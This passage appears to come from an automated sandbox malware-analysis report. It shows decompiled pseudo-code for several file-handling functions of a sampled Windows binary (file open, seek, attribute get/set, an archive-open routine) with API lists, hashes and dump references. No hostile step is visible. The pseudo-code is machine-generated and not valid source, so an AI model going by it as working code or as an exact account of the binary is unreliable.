                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                                                                                    • String ID: 3333
                                                                                                    • API String ID: 3520896023-2924271548
                                                                                                    • Opcode ID: 08088475921de4824743bb48c57fe1e211bef2932a315a451d5f7e811c7b56df
                                                                                                    • Instruction ID: d42addf9f141306d5d3059b4bebc8cb3cd5a4c357728978639a10dc71cc0d153
                                                                                                    • Opcode Fuzzy Hash: 08088475921de4824743bb48c57fe1e211bef2932a315a451d5f7e811c7b56df
                                                                                                    • Instruction Fuzzy Hash: 7021B5B19007446FD7309F7A8881A5BFAF8EB88714F008A3FB18AD3641D674A9458B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7270 Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B7270(void** __ecx, void* __eflags) {
				signed int _t28;
				intOrPtr _t29;
				signed int _t31;
				void* _t35;
				void** _t50;
				void* _t52;

				E0041F1B0(E00423034, _t52);
				_t50 = __ecx;
				_t28 = E003B7322(__ecx);
				if(_t28 != 0) {
					 *((char*)(__ecx + 5)) = 0;
					_t29 = E003B8717( *(_t52 + 8));
					 *((intOrPtr*)(_t52 - 0x10)) = _t29;
					if(_t29 != 1) {
						_t35 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *(_t52 + 0x14),  *(_t52 + 0x18), 0); // executed
						 *_t50 = _t35;
					}
					if( *_t50 == 0xffffffff &&  *((intOrPtr*)(_t52 - 0x10)) != 0) {
						_t31 = E003B2D47(_t52 - 0x1c);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						if(E003B8820( *(_t52 + 8), _t52 - 0x1c, _t52, _t31 & 0xffffff00 |  *((intOrPtr*)(_t52 - 0x10)) != 0x00000001) != 0) {
							 *_t50 = CreateFileW( *(_t52 - 0x1c),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *(_t52 + 0x14),  *(_t52 + 0x18), 0);
						}
						E003B1E40(_t33,  *(_t52 - 0x1c));
					}
					_t28 = 0 |  *_t50 != 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t28;
			}









                                                                                                    0x003b7275
                                                                                                    0x003b727e
                                                                                                    0x003b7280
                                                                                                    0x003b7287
                                                                                                    0x003b7294
                                                                                                    0x003b7297
                                                                                                    0x003b72a5
                                                                                                    0x003b72a8
                                                                                                    0x003b72bb
                                                                                                    0x003b72bd
                                                                                                    0x003b72bd
                                                                                                    0x003b72c2
                                                                                                    0x003b72cc
                                                                                                    0x003b72db
                                                                                                    0x003b72e9
                                                                                                    0x003b72fe
                                                                                                    0x003b72fe
                                                                                                    0x003b7303
                                                                                                    0x003b7308
                                                                                                    0x003b7310
                                                                                                    0x003b7310
                                                                                                    0x003b7317
                                                                                                    0x003b731f

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B7275
                                                                                                      • Part of subcall function 003B7322: FindCloseChangeNotification.KERNELBASE(00000000,?,003B7285,00000002,?,00000000,00000000), ref: 003B732D
                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 003B72BB
                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 003B72FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile$ChangeCloseFindH_prologNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 3273702577-0
                                                                                                    • Opcode ID: f2ec8856d8e64a1fc43c4ddea2c3ca5f0bdc3452ef4de526d7cb41c63c8467dc
                                                                                                    • Instruction ID: 3ce19f1fcba1a008de7c6e9b1f71da3b3942ef284266086cfdd95e85091fa375
                                                                                                    • Opcode Fuzzy Hash: f2ec8856d8e64a1fc43c4ddea2c3ca5f0bdc3452ef4de526d7cb41c63c8467dc
                                                                                                    • Instruction Fuzzy Hash: 71119A7290010BEFCF129FA4DC408EEBBBAFF44358B118529FE61565A0C7359D65EB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E71BF Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 88%
                                                                                                    			E003E71BF(struct _IO_FILE** __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t15;
				void* _t20;
				struct _IO_FILE** _t54;
				void* _t56;

				E0041F1B0(E004261B0, _t56);
				_t54 = __ecx;
				E003B2D8A(_t56 - 0x18, __edx);
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t15 = E003B224D( *((intOrPtr*)(_t56 - 0x18)), 0xa);
				_t62 = _t15;
				if(_t15 < 0) {
					E003B209A(__ecx, _t56 - 0x18);
					_push( *((intOrPtr*)(_t56 - 0x18)));
					L003B1FB3(__ecx, __eflags); // executed
				} else {
					E003B1FA0(__ecx);
					fputs("{",  *__ecx);
					E003B1FA0(_t54);
					E003E7270(_t56 - 0x18);
					E003B2065(_t54, _t56 - 0x18);
					_push( *((intOrPtr*)(_t56 - 0x18)));
					L003B1FB3(_t54, _t62);
					E003B1FA0(_t54);
					fputs("}",  *_t54);
				}
				_t20 = E003B1E40(E003B1FA0(_t54),  *((intOrPtr*)(_t56 - 0x18)));
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t20;
			}







                                                                                                    0x003e71c4
                                                                                                    0x003e71cd
                                                                                                    0x003e71d3
                                                                                                    0x003e71db
                                                                                                    0x003e71e3
                                                                                                    0x003e71e8
                                                                                                    0x003e71ea
                                                                                                    0x003e7244
                                                                                                    0x003e724b
                                                                                                    0x003e724e
                                                                                                    0x003e71ec
                                                                                                    0x003e71ef
                                                                                                    0x003e7201
                                                                                                    0x003e7207
                                                                                                    0x003e720f
                                                                                                    0x003e721a
                                                                                                    0x003e7221
                                                                                                    0x003e7224
                                                                                                    0x003e722b
                                                                                                    0x003e7237
                                                                                                    0x003e723b
                                                                                                    0x003e725d
                                                                                                    0x003e7267
                                                                                                    0x003e726f

                                                                                                    APIs
                                                                                                    • fputs.MSVCRT ref: 003E7237
                                                                                                    • fputs.MSVCRT ref: 003E7201
                                                                                                      • Part of subcall function 003B1FB3: __EH_prolog.LIBCMT ref: 003B1FB8
                                                                                                    • __EH_prolog.LIBCMT ref: 003E71C4
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologfputs$fputc
                                                                                                    • String ID:
                                                                                                    • API String ID: 678540050-0
                                                                                                    • Opcode ID: 319072f138ecb39f5718288103f0c3b3ba70f995205ec70c4f8b093b84009f98
                                                                                                    • Instruction ID: a003aabc18a541a9f52a87fb0ef1572040aa41069f41f70cb7296d1a70192b8a
                                                                                                    • Opcode Fuzzy Hash: 319072f138ecb39f5718288103f0c3b3ba70f995205ec70c4f8b093b84009f98
                                                                                                    • Instruction Fuzzy Hash: 8A11A331B041159ACF0BB7A5D8236FF7B76DF80754F50012AF6019A6D1CF251905CAD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7407 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 85%
                                                                                                    			E003B7407(void** __ecx, intOrPtr __edx, long _a4, long _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				long _t21;
				void* _t22;
				intOrPtr* _t24;
				void* _t25;
				long _t31;
				intOrPtr _t39;
				long _t41;
				void** _t44;

				_t39 = __edx;
				_push(__ecx);
				_t44 = __ecx;
				if( *((char*)(__ecx + 5)) != 0 &&  *((char*)(__ecx + 6)) != 0 && _a12 == 2) {
					_a4 = _a4 +  *((intOrPtr*)(__ecx + 8));
					asm("adc [ebp+0xc], ecx");
					_a12 = _a12 & 0x00000000;
				}
				_v8 = _a8;
				_t21 = SetFilePointer( *_t44, _a4,  &_v8, _a12); // executed
				_t41 = _t21;
				if(_t41 != 0xffffffff) {
					L7:
					_t22 = E0041F4B0(_v8, 0, 0, 1);
					asm("adc edx, eax");
					_t24 = _a16;
					 *_t24 = _t22 + _t41;
					 *((intOrPtr*)(_t24 + 4)) = _t39;
					_t25 = 1;
				} else {
					_t31 = GetLastError();
					if(_t31 == 0) {
						goto L7;
					} else {
						E003B73AC(_t44, _t39, _a16);
						SetLastError(_t31);
						_t25 = 0;
					}
				}
				return _t25;
			}












                                                                                                    0x003b7407
                                                                                                    0x003b740a
                                                                                                    0x003b740d
                                                                                                    0x003b7414
                                                                                                    0x003b7428
                                                                                                    0x003b742b
                                                                                                    0x003b742e
                                                                                                    0x003b742e
                                                                                                    0x003b743a
                                                                                                    0x003b7449
                                                                                                    0x003b744f
                                                                                                    0x003b7454
                                                                                                    0x003b7477
                                                                                                    0x003b7480
                                                                                                    0x003b748b
                                                                                                    0x003b748d
                                                                                                    0x003b7490
                                                                                                    0x003b7492
                                                                                                    0x003b7495
                                                                                                    0x003b7456
                                                                                                    0x003b745c
                                                                                                    0x003b7460
                                                                                                    0x00000000
                                                                                                    0x003b7462
                                                                                                    0x003b7467
                                                                                                    0x003b746d
                                                                                                    0x003b7473
                                                                                                    0x003b7473
                                                                                                    0x003b7460
                                                                                                    0x003b749b

                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,003B74B1,?,?,00000000,?,003B7508,?), ref: 003B7449
                                                                                                    • GetLastError.KERNEL32(?,003B74B1,?,?,00000000,?,003B7508,?,?,?,?,00000000), ref: 003B7456
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,003B74B1,?,?,00000000,?,003B7508,?,?,?,?,00000000), ref: 003B746D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: b77581ea0033c59a08b81ef135ece9ec6467a21c324b358f66d6c924726f029d
                                                                                                    • Instruction ID: 241ba9704e636294d0745f8b26db9a73ec515a22133929d38969aaec9a61c537
                                                                                                    • Opcode Fuzzy Hash: b77581ea0033c59a08b81ef135ece9ec6467a21c324b358f66d6c924726f029d
                                                                                                    • Instruction Fuzzy Hash: DD11E231204304AFDB128F69CC49BEE3BE5EF44329F458439F94687691C7749E51DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B5762 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B5762(WCHAR* __ecx, long __edx) {
				signed int _t19;
				signed int _t20;
				int _t24;
				int _t26;
				void* _t28;
				WCHAR* _t39;
				void* _t45;

				E0041F1B0(E00422DA0, _t45);
				 *(_t45 - 0x10) = __edx;
				_t39 = __ecx;
				_t28 = E003B8717(__ecx);
				if(_t28 == 1) {
					L3:
					if(_t28 == 0) {
						L7:
						_t19 = 0;
					} else {
						_t20 = E003B2D47(_t45 - 0x1c);
						 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
						if(E003B8820(_t39, _t45 - 0x1c, _t45, _t20 & 0xffffff00 | _t28 != 0x00000001) == 0) {
							E003B1E40(_t22,  *(_t45 - 0x1c));
							goto L7;
						} else {
							_t24 = SetFileAttributesW( *(_t45 - 0x1c),  *(_t45 - 0x10));
							_t19 = E003B1E40(_t24,  *(_t45 - 0x1c)) & 0xffffff00 | _t24 != 0x00000000;
						}
					}
				} else {
					_t26 = SetFileAttributesW(__ecx,  *(_t45 - 0x10)); // executed
					if(_t26 == 0) {
						goto L3;
					} else {
						_t19 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t19;
			}










                                                                                                    0x003b5767
                                                                                                    0x003b5772
                                                                                                    0x003b5775
                                                                                                    0x003b5782
                                                                                                    0x003b5787
                                                                                                    0x003b5797
                                                                                                    0x003b5799
                                                                                                    0x003b57df
                                                                                                    0x003b57df
                                                                                                    0x003b579b
                                                                                                    0x003b579e
                                                                                                    0x003b57a3
                                                                                                    0x003b57ba
                                                                                                    0x003b57d9
                                                                                                    0x00000000
                                                                                                    0x003b57bc
                                                                                                    0x003b57c2
                                                                                                    0x003b57d1
                                                                                                    0x003b57d1
                                                                                                    0x003b57ba
                                                                                                    0x003b5789
                                                                                                    0x003b578d
                                                                                                    0x003b5791
                                                                                                    0x00000000
                                                                                                    0x003b5793
                                                                                                    0x003b5793
                                                                                                    0x003b5793
                                                                                                    0x003b5791
                                                                                                    0x003b57e7
                                                                                                    0x003b57ef

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B5767
                                                                                                    • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 003B578D
                                                                                                    • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 003B57C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3790360811-0
                                                                                                    • Opcode ID: 1e52547fe18fabed9fff0590d0aa890657dbdd641369f13b31c95c5b1d441a3e
                                                                                                    • Instruction ID: 6718ca64b056bd219a64c0b33c136ac5f43e02f8bd7bb956e8d284f1e1ec4432
                                                                                                    • Opcode Fuzzy Hash: 1e52547fe18fabed9fff0590d0aa890657dbdd641369f13b31c95c5b1d441a3e
                                                                                                    • Instruction Fuzzy Hash: AE01B932E00219E7CF17AB90DC826FEB779EF44358F644066DA1167D51DF794C01D650
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B68E0 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 77%
                                                                                                    			E003B68E0(WCHAR* __ecx) {
				signed int _t12;
				long _t13;
				signed int _t14;
				void* _t16;
				long _t17;
				signed int _t20;
				WCHAR* _t30;
				void* _t36;

				E0041F1B0(E00422F54, _t36);
				_t30 = __ecx;
				_t12 = E003B8717(__ecx);
				_t20 = _t12;
				if(_t20 == 1) {
					L2:
					if(_t20 == 0) {
						L6:
						_t13 = _t12 | 0xffffffff;
					} else {
						_t1 = _t36 - 0x18; // -24
						_t14 = E003B2D47(_t1);
						 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
						_t6 = _t36 - 0x18; // -24
						_t16 = E003B8820(_t30, _t6, _t36, _t14 & 0xffffff00 | _t20 != 0x00000001);
						_push( *((intOrPtr*)(_t36 - 0x18)));
						if(_t16 == 0) {
							_t12 = E003B1E40(_t16);
							goto L6;
						} else {
							_t17 = GetFileAttributesW(); // executed
							E003B1E40(_t17,  *((intOrPtr*)(_t36 - 0x18)));
							_t13 = _t17;
						}
					}
				} else {
					_t13 = GetFileAttributesW(__ecx); // executed
					if(_t13 == 0xffffffff) {
						goto L2;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t13;
			}











                                                                                                    0x003b68e5
                                                                                                    0x003b68f0
                                                                                                    0x003b68f2
                                                                                                    0x003b68fd
                                                                                                    0x003b6902
                                                                                                    0x003b690c
                                                                                                    0x003b690e
                                                                                                    0x003b694b
                                                                                                    0x003b694b
                                                                                                    0x003b6910
                                                                                                    0x003b6910
                                                                                                    0x003b6913
                                                                                                    0x003b6918
                                                                                                    0x003b6923
                                                                                                    0x003b6928
                                                                                                    0x003b692f
                                                                                                    0x003b6932
                                                                                                    0x003b6945
                                                                                                    0x00000000
                                                                                                    0x003b6934
                                                                                                    0x003b6934
                                                                                                    0x003b693b
                                                                                                    0x003b6941
                                                                                                    0x003b6941
                                                                                                    0x003b6932
                                                                                                    0x003b6904
                                                                                                    0x003b6905
                                                                                                    0x003b690a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b690a
                                                                                                    0x003b6954
                                                                                                    0x003b695c

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B68E5
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 003B6905
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 003B6934
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$H_prologfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 86656847-0
                                                                                                    • Opcode ID: 0b939b7a7ebb85edae66179dd1da00d613a5b3ee20fb84ce326c10540acd2db8
                                                                                                    • Instruction ID: 49295bf07cffc88296854cb4a07dcf0b55c900f76b6da5c9f5dc7a09c443ecca
                                                                                                    • Opcode Fuzzy Hash: 0b939b7a7ebb85edae66179dd1da00d613a5b3ee20fb84ce326c10540acd2db8
                                                                                                    • Instruction Fuzzy Hash: 9A01F932A00105A7CB237BB598835FEB7699F84378F10023AEB21A79D2CF784D559590
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C47F0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E003C47F0(void* __ecx) {
				void* __ebx;
				signed int _t186;
				void* _t194;
				void* _t195;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t214;
				signed int _t217;
				char _t218;
				signed int _t220;
				signed int _t223;
				signed int _t227;
				signed int _t229;
				signed int _t239;
				signed int _t240;
				void* _t245;
				signed int _t250;
				intOrPtr _t257;
				void* _t271;
				void* _t273;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t282;
				signed int _t310;
				signed int _t316;
				signed int _t361;
				signed char* _t367;
				signed int _t368;
				signed int* _t370;
				intOrPtr* _t371;
				char* _t372;
				void* _t376;
				signed int _t378;
				void* _t379;

				E0041F1B0(0x423cde, _t379);
				_t376 = __ecx;
				 *( *(_t379 + 0xc)) = 1;
				_t186 = E003C40C6(__ecx);
				_t276 = 0;
				if(_t186 != 0) {
					L95:
					 *[fs:0x0] =  *((intOrPtr*)(_t379 - 0xc));
					return _t186;
				}
				 *((intOrPtr*)(_t379 - 0x18)) =  *((intOrPtr*)(__ecx + 0x104));
				 *(_t379 - 0xd) =  *(_t379 - 0xd) & 0;
				 *(_t379 - 0x14) =  *( *(__ecx + 0x1c));
				_t186 = L003D77D2( *( *(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x104)), 0x15, _t379 - 0xd);
				_t385 = _t186;
				if(_t186 != 0) {
					goto L95;
				} else {
					E003C4236(0, _t376);
					_t354 = _t376 + 0x8c;
					E003D234E(_t379 - 0x34, _t376 + 0x8c, _t385);
					_t386 =  *(_t379 - 0xd);
					 *((intOrPtr*)(_t379 - 4)) = 0;
					if( *(_t379 - 0xd) == 0) {
						E003C43C7(_t376, _t354);
					}
					E003B2E5F(_t379 - 0x28, _t386, _t379 - 0x34);
					 *((char*)(_t379 - 4)) = 1;
					if( *((intOrPtr*)(_t376 + 0x44)) != 3) {
						L6:
						_push(_t379 - 0x28);
						_t194 = E003C4E1D(_t379 - 0x40, _t376 + 0x5c, _t388);
						 *((char*)(_t379 - 4)) = 2;
						_t195 = E003B2F2F(_t379 - 0x28, _t194);
						 *((char*)(_t379 - 4)) = 1;
						E003B1E40(_t195,  *((intOrPtr*)(_t379 - 0x40)));
						L7:
						if( *((char*)(_t376 + 0xb0)) == 0) {
							L12:
							if( *((char*)(_t376 + 0xb2)) == 0) {
								__eflags =  *(_t376 + 0x30);
								if(__eflags != 0) {
									L23:
									_t367 =  *(_t379 + 0xc);
									L24:
									_t198 = E003B2F2F(_t376 + 0xc0, _t379 - 0x28);
									__eflags =  *(_t379 - 0xd);
									if( *(_t379 - 0xd) == 0) {
										__eflags =  *((intOrPtr*)(_t376 + 0x1dc)) - _t276;
										if( *((intOrPtr*)(_t376 + 0x1dc)) == _t276) {
											__eflags =  *((intOrPtr*)(_t376 + 0x1c0)) - _t276;
											if( *((intOrPtr*)(_t376 + 0x1c0)) == _t276) {
												L40:
												_push(0x20);
												_t199 = E003B1E0C();
												 *(_t379 - 0x14) = _t199;
												__eflags = _t199 - _t276;
												 *((char*)(_t379 - 4)) = 5;
												if(_t199 == _t276) {
													_t368 = 0;
													__eflags = 0;
												} else {
													_t368 = E003BE750(_t199);
												}
												__eflags = _t368 - _t276;
												 *(_t379 - 0x14) = _t368;
												 *((char*)(_t379 - 4)) = 1;
												 *(_t376 + 0x118) = _t368;
												 *(_t379 - 0x1c) = _t368;
												if(_t368 != _t276) {
													 *((intOrPtr*)( *_t368 + 4))(_t368);
												}
												_t200 =  *(_t376 + 0x118);
												 *((char*)(_t379 - 4)) = 6;
												asm("sbb edx, edx");
												 *((intOrPtr*)(_t200 + 0x18)) = _t276;
												 *((intOrPtr*)(_t200 + 0x1c)) = _t276;
												_t201 = L003B78E3( *((intOrPtr*)(_t379 - 0x28)), ( ~( *(_t376 + 0x30)) & 0x00000002) + 2);
												__eflags = _t201;
												if(_t201 != 0) {
													_t361 =  *((intOrPtr*)(_t376 + 0x3b));
													 *((char*)(_t376 + 0x38)) = 1;
													__eflags = _t361;
													if(_t361 == 0) {
														L70:
														__eflags =  *((char*)(_t376 + 0x2d));
														if( *((char*)(_t376 + 0x2d)) == 0) {
															L79:
															__eflags =  *((char*)(_t376 + 0x1f0));
															if( *((char*)(_t376 + 0x1f0)) != 0) {
																__eflags =  *((char*)(_t376 + 0xb0));
																if(__eflags == 0) {
																	 *((intOrPtr*)(_t379 - 0x44)) =  *((intOrPtr*)(_t379 - 0x18));
																	E003B2E5F(_t379 - 0x40, __eflags, _t379 - 0x28);
																	 *((intOrPtr*)(_t379 - 0x18)) =  *((intOrPtr*)(_t376 + 0x1e8));
																	_t280 = _t376 + 0x1e4;
																	 *((char*)(_t379 - 4)) = 7;
																	_t214 = E003C6660(_t379 - 0x44);
																	__eflags =  *((intOrPtr*)(_t379 - 0x18)) -  *((intOrPtr*)(_t376 + 0x1e8));
																	if( *((intOrPtr*)(_t379 - 0x18)) ==  *((intOrPtr*)(_t376 + 0x1e8))) {
																		_t165 =  *((intOrPtr*)( *_t280 + _t214 * 4)) + 4; // 0x4
																		_t214 = E003B2F2F(_t165, _t379 - 0x28);
																	}
																	 *((char*)(_t379 - 4)) = 6;
																	E003B1E40(_t214,  *((intOrPtr*)(_t379 - 0x40)));
																	_t368 =  *(_t379 - 0x14);
																}
															}
															__eflags =  *(_t376 + 0x30);
															if( *(_t376 + 0x30) == 0) {
																L89:
																L00403CED( *((intOrPtr*)(_t379 + 8)), _t368);
																L90:
																L00403CED(_t376 + 0x11c, _t368);
																_t198 =  *(_t379 + 0xc);
																 *((char*)(_t379 - 4)) = 1;
																 *( *(_t379 + 0xc)) =  *( *(_t379 + 0xc)) & 0x00000000;
																__eflags = _t368;
																goto L91;
															} else {
																_t279 =  *((intOrPtr*)( *_t368 + 0x10))(_t368,  *((intOrPtr*)(_t376 + 0xd0)),  *((intOrPtr*)(_t376 + 0xd4)), 0, 0);
																__eflags = _t279;
																if(_t279 == 0) {
																	goto L89;
																}
																L86:
																__eflags = _t368;
																 *((char*)(_t379 - 4)) = 1;
																if(_t368 != 0) {
																	_t198 =  *((intOrPtr*)( *_t368 + 8))(_t368);
																}
																_t378 = _t279;
																goto L94;
															}
														}
														__eflags =  *(_t376 + 0x30);
														if( *(_t376 + 0x30) != 0) {
															goto L79;
														}
														__eflags = _t361;
														if(_t361 == 0) {
															goto L79;
														}
														_t310 =  *(_t376 + 0x10c);
														_t217 =  *(_t376 + 0x108);
														__eflags = _t310;
														if(_t310 > 0) {
															L75:
															 *(_t376 + 0x110) = _t217;
															 *(_t376 + 0x114) = _t310;
															_t218 = L003B7A21( *(_t376 + 0x118) + 8, _t217, _t310); // executed
															__eflags = _t218;
															 *((char*)(_t376 + 0x3c)) = _t218;
															if(_t218 != 0) {
																L77:
																_t220 = E003B74B4( *(_t376 + 0x118) + 8); // executed
																__eflags = _t220;
																if(_t220 != 0) {
																	goto L79;
																}
																_push(_t379 - 0x28);
																_push("Cannot seek to begin of file");
																_t279 = L003C3A05(_t376);
																__eflags = _t279;
																if(_t279 != 0) {
																	goto L86;
																}
																goto L79;
															}
															_push(_t379 - 0x28);
															_push( *0x42a39c);
															_t279 = L003C3A05(_t376);
															__eflags = _t279;
															if(_t279 != 0) {
																goto L86;
															}
															goto L77;
														}
														__eflags = _t217 - 0x1000;
														if(_t217 <= 0x1000) {
															goto L79;
														}
														goto L75;
													}
													_t223 =  *(_t376 + 0x10c);
													_t316 =  *(_t376 + 0x108);
													__eflags = _t223;
													if(_t223 > 0) {
														goto L70;
													}
													__eflags = _t316;
													if(_t316 <= 0) {
														goto L70;
													}
													__eflags = _t223;
													if(__eflags > 0) {
														goto L70;
													}
													if(__eflags < 0) {
														L60:
														__eflags =  *((char*)(_t376 + 0x100));
														if( *((char*)(_t376 + 0x100)) == 0) {
															goto L70;
														}
														__eflags = ( *(_t376 + 0xfc) & 0xf0000000) - 0xa0000000;
														if(( *(_t376 + 0xfc) & 0xf0000000) != 0xa0000000) {
															__eflags =  *((char*)(_t376 + 0x100));
															if( *((char*)(_t376 + 0x100)) == 0) {
																goto L70;
															}
															__eflags =  *(_t376 + 0xfd) & 0x00000004;
															if(( *(_t376 + 0xfd) & 0x00000004) == 0) {
																goto L70;
															}
															_t121 = _t376 + 0x37;
